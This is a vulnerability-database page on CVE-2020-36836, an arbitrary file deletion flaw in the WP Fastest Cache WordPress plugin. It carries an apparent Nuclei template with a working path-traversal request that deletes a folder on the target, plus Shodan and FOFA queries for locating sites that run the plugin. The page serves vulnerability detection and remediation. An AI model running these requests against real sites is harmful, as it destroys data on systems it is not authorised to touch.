| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2020-36836 | 6 Sep 202511:16 | – | circl | |
| WordPress plugin WP Fastest Cache 跨站请求伪造漏洞 | 16 Oct 202400:00 | – | cnnvd | |
| CVE-2020-36836 | 16 Oct 202406:43 | – | cve | |
| CVE-2020-36836 WP Fastest Cache <= 0.9.0.2 - Authenticated (Subscriber+) Arbitrary File Deletion | 16 Oct 202406:43 | – | cvelist | |
| EUVD-2020-30788 | 16 Oct 202406:43 | – | euvd | |
| CVE-2020-36836 | 16 Oct 202407:15 | – | nvd | |
| CVE-2020-36836 | 16 Oct 202407:15 | – | osv | |
| PT-2024-10846 | 15 Oct 202400:00 | – | ptsecurity | |
| CVE-2020-36836 | 5 Feb 202515:09 | – | redhatcve | |
| VulnCheck KEV: CVE-2020-36836 | 15 Oct 202400:00 | – | vulncheck_kev |
id: CVE-2020-36836
info:
name: WordPress WP Fastest Cache <= 0.9.0.2 - Authenticated Arbitrary File Deletion
author: melmathari
severity: high
description: |
The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized arbitrary file deletion in versions up to, and including, 0.9.0.2 due to a lack of capability checking and insufficient path validation. This makes it possible for authenticated users with minimal permissions to delete arbitrary files from the server.
impact: |
Authenticated attackers with minimal permissions can delete arbitrary files from the server, potentially breaking the WordPress installation or exposing sensitive data.
remediation: |
Update WP Fastest Cache to version 0.9.0.3 or later to mitigate this vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6e699a-775e-4c59-a266-874eab5fa3a6
- https://nvd.nist.gov/vuln/detail/CVE-2020-36836
- https://plugins.trac.wordpress.org/changeset/2342347/wp-fastest-cache
- https://wearetradecraft.com/advisories/tc-2020-0001/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2020-36836
cwe-id: CWE-862
epss-score: 0.01367
epss-percentile: 0.68524
cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: wpfastestcache
product: wp_fastest_cache
framework: wordpress
shodan-query: "http.html:/wp-content/plugins/wp-fastest-cache/"
fofa-query: "body=/wp-content/plugins/wp-fastest-cache/"
publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
tags: cve,cve2020,wordpress,wp-plugin,wp-fastest-cache,auth,intrusive,wpfastestcache,vkev,vuln
variables:
target_path: "languages"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 200"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302 || status_code == 200'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?path=/../../../wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpfc_delete_current_page_cache
matchers:
- type: dsl
dsl:
- "contains_all(body, 'The cache of page has been cleared', 'success')"
- "status_code == 200"
condition: and
- raw:
- |
GET /wp-content/plugins/wp-fastest-cache/{{target_path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- "status_code == 404"
internal: true
# digest: 490a0046304402201ffe8f1c23587720509ad104ee9ef3da9c77e62fe604e33995f738359388fd35022044f1ce93d5eb72e39257f7712155b41d3230cfaed6bd40b29b41054951c52c95:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation